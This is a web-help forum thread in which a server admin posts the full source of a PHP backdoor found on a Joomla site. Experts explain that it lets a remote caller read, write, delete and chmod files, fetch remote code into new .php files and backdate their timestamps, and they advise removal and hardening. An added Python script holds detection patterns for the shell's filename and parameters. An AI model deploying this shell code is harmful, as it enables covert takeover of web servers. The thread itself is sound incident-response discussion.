Solved

strange file suddenly appeared

Posted on 2013-12-14
10
554 Views
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP that I'm not entirely sure what it's all supposed to be doing or what its origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but WordPress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>

Any ideas?

Thanks
Question by:billium99
10 Comments
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39718988
I only took a look, but if I were you I would immediately back up those files to my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions and deletes files, and these are things only you should do: if you're not sure about it, don't trust it.

I don't know Joomla, but I doubt any framework can create such files: I repeat, copy them to an inoffensive location and delete them from the server, then talk with the host provider.
0
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
0
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the PHP command to delete files.
0
 
LVL 83

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
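An added defensive example, not code from the thread, from Joomla or from any of the posters: a small Python script that does the two checks an admin would want after finding a file like this. It triages a PHP source file for the traits the experts point out (request parameters feeding chmod/unlink/fopen-style calls, error reporting switched off, a file that serves its own source), and it scans web-server access log lines for requests to the dropped filename or carrying the parameter names that file reads from $_GET. The log regex assumes Apache/NCSA common log format (an IIS W3C log, likely on a Windows 2008 host, would need a different line pattern); the sample PHP fragment and log lines are constructed for the demo, with addresses from documentation IP ranges, and the parameter list is taken from the file posted in the question.

```python
import os
import re

# --- Static triage of PHP source ------------------------------------------------

# Filesystem / execution functions that should never receive raw request input.
SINKS = ("unlink", "chmod", "mkdir", "rmdir", "fopen", "file_put_contents",
         "file_get_contents", "touch", "eval", "system", "exec", "passthru")

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"


def scan_php_source(src):
    """Count indicators of a remotely driven file-management script in PHP source."""
    findings = {
        "sink_takes_request_input": 0,    # e.g. unlink($_GET['del'])
        "sink_takes_tainted_variable": 0,  # $x = $_GET[...]; ... unlink($x)
        "error_reporting_disabled": 0,     # error_reporting(0)
        "discloses_own_source": 0,         # file_get_contents(__FILE__)
        "ignore_user_abort": 0,
        "request_params_read": 0,          # distinct $_GET['name'] style reads
    }
    # Variables assigned directly from a request superglobal.
    tainted = set(re.findall(r"\$(\w+)\s*=\s*" + SUPERGLOBAL, src))
    for sink in SINKS:
        call = r"\b" + sink + r"\s*\([^;]*"          # sink( ... up to the next ';'
        findings["sink_takes_request_input"] += len(re.findall(call + SUPERGLOBAL, src))
        for var in tainted:
            if re.search(call + r"\$" + re.escape(var) + r"\b", src):
                findings["sink_takes_tainted_variable"] += 1
    if re.search(r"error_reporting\s*\(\s*0\s*\)", src):
        findings["error_reporting_disabled"] = 1
    if re.search(r"file_get_contents\s*\(\s*__FILE__\s*\)", src):
        findings["discloses_own_source"] = 1
    if re.search(r"ignore_user_abort\s*\(", src):
        findings["ignore_user_abort"] = 1
    params = re.findall(SUPERGLOBAL + r"\s*\[\s*['\"](\w+)['\"]\s*\]", src)
    findings["request_params_read"] = len(set(params))
    return findings


def is_suspicious(findings):
    """A file that lets request input reach a sink, or hands out its own source, needs a look."""
    flows = findings["sink_takes_request_input"] + findings["sink_takes_tainted_variable"]
    return flows > 0 or findings["discloses_own_source"] > 0


def scan_webroot(root):
    """Walk a web root and return {path: findings} for PHP files that look suspicious."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings = scan_php_source(fh.read())
                if is_suspicious(findings):
                    report[full] = findings
    return report


# --- Access log sweep -----------------------------------------------------------

# Query parameter names read by the file posted in the question.
SHELL_PARAMS = {"sc", "scmd5", "read", "write", "del", "else_dot", "flag_sum",
                "chmod_name", "chmod_mod", "f_creat_url", "f_creat_name",
                "f_del_name", "folder_creat_name", "folder_del_name", "tfilet"}
# Names common enough in legitimate apps that one of them alone is not a signal.
GENERIC_PARAMS = {"sc", "scmd5", "read", "write", "del"}

# Apache/NCSA common log format (assumption; IIS W3C logs need a different pattern).
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def scan_access_log(lines, dropped_files=("wp-sto.php",)):
    """Flag requests that hit a known dropped file or carry its distinctive parameter names."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path, _, query = m.group("path").partition("?")
        params = {p.split("=", 1)[0] for p in query.split("&") if p}
        reasons = []
        if any(path.endswith("/" + f) for f in dropped_files):
            reasons.append("dropped_file")
        overlap = params & SHELL_PARAMS
        if (overlap - GENERIC_PARAMS) or len(overlap) >= 2:
            reasons.append("shell_params:" + ",".join(sorted(overlap)))
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"), "path": path,
                         "status": m.group("status"), "reasons": reasons})
    return hits


# Constructed sample input for the demo (not the real file or real logs).
SAMPLE_PHP = r"""<?php
error_reporting(0);
$target = $_GET['del'];
if ($target) { unlink($target); }
if (isset($_GET['sc'])) die(file_get_contents(__FILE__));
?>"""

SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2013:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Dec/2013:03:14:09 +0000] "GET /wp-sto.php?sc=1 HTTP/1.1" 200 3921',
    '203.0.113.7 - - [10/Dec/2013:03:15:41 +0000] "GET /wp-sto.php?flag_sum=1&else_dot=1 HTTP/1.1" 200 12',
    '198.51.100.22 - - [11/Dec/2013:09:00:01 +0000] "GET /components/com_content/?view=article&id=12 HTTP/1.1" 200 8800',
    '192.0.2.5 - - [12/Dec/2013:11:22:33 +0000] "POST /administrator/index.php?read=1 HTTP/1.1" 303 0',
]

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Point scan_webroot at the site root to sweep every PHP file, and feed the real access log (from the four days before the file was noticed, as the question dates it) to scan_access_log; the source addresses and timestamps of the hits are what you then look for in the Joomla and FTP/RDP logs to work out how the file got there. The log rule deliberately ignores a lone read, write or del parameter, since plenty of legitimate applications use those names; it needs either one of the unusual names (f_creat_url, folder_del_name and so on) or two of the shell's names together.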
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
0
 
LVL 31

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand what exactly it does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file, passing it some parameters, and do something bad like delete your files, even empty whole directories...

Change all passwords and secure your dedicated server, because it has been violated. I'm sorry.
0
 
LVL 34

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
LVL 109

Accepted Solution

by:Ray Paseur
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks
0
